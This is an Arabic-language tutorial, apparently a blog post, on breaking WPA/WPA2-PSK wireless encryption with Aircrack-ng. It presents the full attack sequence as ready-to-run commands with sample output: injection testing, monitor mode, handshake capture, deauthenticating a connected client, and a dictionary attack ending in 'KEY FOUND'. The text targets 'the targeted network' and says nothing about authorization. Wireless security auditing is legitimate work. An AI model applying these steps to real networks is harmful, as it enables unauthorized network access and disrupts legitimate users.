السلام عليكم ورحمة الله وبركاته
اعداد : حسن الجوهرى
.jpg)
في هذا الموضوع إن شاء الله سنتطرق لشرح كيفية فك تشفير شبكات الوايرلس التي تستخدم تشفير WPA/WPA2-PSK عن طريق عمل هجوم Brute force لاستخراج مفتاح الشبكة باسخدام مجموعة Aricrack-ng.قبل البدء بعملية الكسر - BEFORE THE CRACKING:
يجب ان يكون كرت الوايرلس الذي تستخدمه يدعم الحقن او الـ injection ولمعرفة ذلك استخدم الامر التالي :
aireplay-ng -9 -e JONA -a 00:de:af:da:c7:00 wlan09- تعني اختبار الحقن.e- اسم الاكسس بوينت AP.a- العنوان الفيزيائي للشبكة Mac adress.wlan0 كرت الوايرلس
الناتج سيكون كالاتي:
11:01:06 ath0 channel: 9 11:01:06 Trying broadcast probe requests...11:01:06 Injection is working!11:01:07 Found 1 APs 11:01:07 Trying directed probe requests...11:01:07 00:14:6C:7E:40:80 - channel: 9 - 'JONA'11:01:07 Ping (min/avg/max): 2.763ms/4.190ms/8.159ms11:01:07 30/30: 100%وأهم سطرين هما الثالث والاخير وهنا القيمة في السطر الاخير هي %100 وهذا يعني ان بامكاننا عمل injection للشبكة.
يجب ان تكون قريب كفاية من الشبكة المستهدفة لكي تستطيع ارسال الباكيت لها وتذكر ان اشارة الاكسس بوينت اقوى من اشارة كرت الوايرلس لديك وهذا يعني انك اذا كنت تستطيع استقبال الباكيت من الاكسس بوينت فذلك لا يعني انك تستطيع ارسال الباكيت.
سأستخدم نظام لينكس وحزمة Aircrack-ng. الخطوات التي سنقوم بتنفيذها - CRACKING STEPS:
وضع كرت الوايرلس في الوضع monitor وفي نفس القناة التي تستخدمها الاكسس بوينت.airodump-ng للحصول على الـ authentication handshake .aireplay-ng لفصل الكلاينت عن الشبكة.aircrack-ng لفك تشفير الـ PSK باستخدام الـ handshake.
عملية كسر تشفير شبكة الوايرلس - CRACKING:
نبدأ العملية بوضع كرت الوايرلس بالوضع monitor بتنفيذ الأمر التالي:
airmon-ng start wlan0 9wlan0: كرت الوايرلس 9: القناة التي تستخدمها الاكسس بوينت
airodump-ng -c 9 --bssid 00:de:af:da:c7:00 -w psk wlan0c- القناة التي تستخدمها الاكسس بوينت.bssid-- العنوان الفيزيائي للشبكة Mac adress.w- اسم الملف الذي ستخزن به الباكيت او الحروف التي ستضاف لاسماء الباكيت للتمييز بينها.
أهم شيء هنا هو الـ handshake وسيظهر في أعلى يمين الشاشة . ويجب ان يكون جهاز متصل بالشبكة كلاينت.
aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 wlan00- تعني deauthentication 1 هي عدد الـ deauthentication التي سيتم ارسالهاa- هي العنوان الفيزيائي للاكسس بوينت mac adress.c- العنوان الفيزيائي للكلاينت الذي سيتم فصله.
والناتج تقريبا كالاتي:
11:09:28 Sending DeAuth to station -- STMAC: [00:0F:B5:34:30:30]نفذ الأمر لكسر تشفير الملف واستخراج مفتاح الشبكة:
aircrack-ng -w password.lst -b 00:de:af:da:c7:00 psk*.cap-w ملف المفاتيح الذي سيتم اختبارهاpsk الاسم الذي اخترناه في الخطوة الاولى للباكيت.
والناتج سيكون كالاتي:
Aircrack-ng 0.8 [00:00:00] 2 keys tested (37.20 k/s)
KEY FOUND! [ 123456 ]
Master Key : CD 69 0D 11 8E AC AA C5 C5 EC BB 59 85 7D 49 3E B8 A6 13 C5 4A 72 82 38 ED C3 7E 2C 59 5E AB FD
Transcient Key : 06 F8 BB F3 B1 55 AE EE 1F 66 AE 51 1F F8 12 98 CE 8A 9D A0 FC ED A6 DE 70 84 BA 90 83 7E CD 40 FF 1D 41 E1 65 17 93 0E 64 32 BF 25 50 D5 4A 5E 2B 20 90 8C EA 32 15 A6 26 62 93 27 66 66 E0 71
EAPOL HMAC : 4E 27 D9 5B 00 91 53 57 88 9C 66 C8 B1 29 D1 CB
Post a Comment